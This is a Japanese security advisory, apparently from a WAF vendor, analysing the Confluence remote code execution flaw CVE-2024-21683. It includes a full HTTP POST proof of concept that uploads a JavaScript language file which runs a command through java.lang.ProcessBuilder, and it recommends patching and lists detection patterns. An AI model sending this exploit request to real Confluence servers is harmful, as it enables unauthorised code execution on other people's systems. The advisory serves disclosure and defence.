TA チームが 「Atlassian Confluence Remote Code Execution (CVE-2024-21683)」 を分析して書いた脆弱性レポートです。
アトラシアン Confluence リモートコード実行
この脆弱性は Confluence Data Center および Server の RCE 脆弱性で、「Confusion Administrator」権限を持つユーザーが一般構成 - 構成コードマクロ設定の「新しい言語を追加」機能を通じて悪意のある JS ファイルをアップロードし、悪意のあるコマンドを実行することが可能です。
本脆弱性は、Atlasian 社が 2024 年 3 月に発表したセキュリティアップデートを適用することで解消され、弊社 AIWAF 製品では、通常、関連するパターンにより検知されます。
1. 概要
アトラシアンが提供する、チーム間のコラボレーションオプションを提供するソリューションである Confluence は、このソリューションにおけるリモートコード実行の脆弱性 CVE-2024-21683 について分析されています。
ソース : https://www.helpnetsecurity.com/2024/06/03/cve-2024-21683-poc/
2. 攻撃タイプ
この脆弱性は Confluence Data Center および Server に存在する RCE 脆弱性で、脆弱性の悪用情報が Github で公開されたことで注目を集めた。
この脆弱性は、「一般構成」-「コードマクロの構成」設定で「新しい言語を追加」機能を選択することで、ユーザーを騙して任意のファイルをアップロードさせ、悪意を持って細工された JS ファイルを実行させるものです。
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"
[ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"
RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--
しかし、この脆弱性は「Confluence Administrator」権限を持つユーザーアカウントでしか設定にアクセスできないため、脆弱性を悪用するのは比較的難しく、高度な権限を持つアカウントが必要だが、そのアカウントを取得できれば、マルウェアを実行するのは非常に簡単だ。
3. 何をすべきか
アトラシアンは 3 月 2024 日のセキュリティアップデートでこの脆弱性に対するパッチをリリースしていますので、Confluence を最新バージョンにアップデートすることでこの脆弱性から保護することができます。
当社の AIWAF 製品は、851: Apache HTTP Server を使用し、851 の java.lang.構文などの構文を検出します: Apache Struts Framework Vulnerability パターン、または JS ファイルアップロードを検出する 724: Upload File Vulnerability (Script) パターンを使用していますが、この攻撃構文に対する追加パターンが必要かどうか、さらに分析を行っている最中です。
4. 結論
Altassian Confluence の RCE 攻撃は、一定レベルの権限を持つアカウントが必要なため制限されていますが、そのアカウントを持っていれば、シンプルで簡単に悪用できる脆弱性であり、多くの組織がこのソリューションを使用しているため、影響は十分に大きく、できるだけ早く最新バージョンにアップデートする必要があります。
当社の AIWAF 製品は Altassian Confluence の脆弱性に対するパターンを開発しており、今後も関連する脆弱性が発見された場合には迅速に対応していきます。
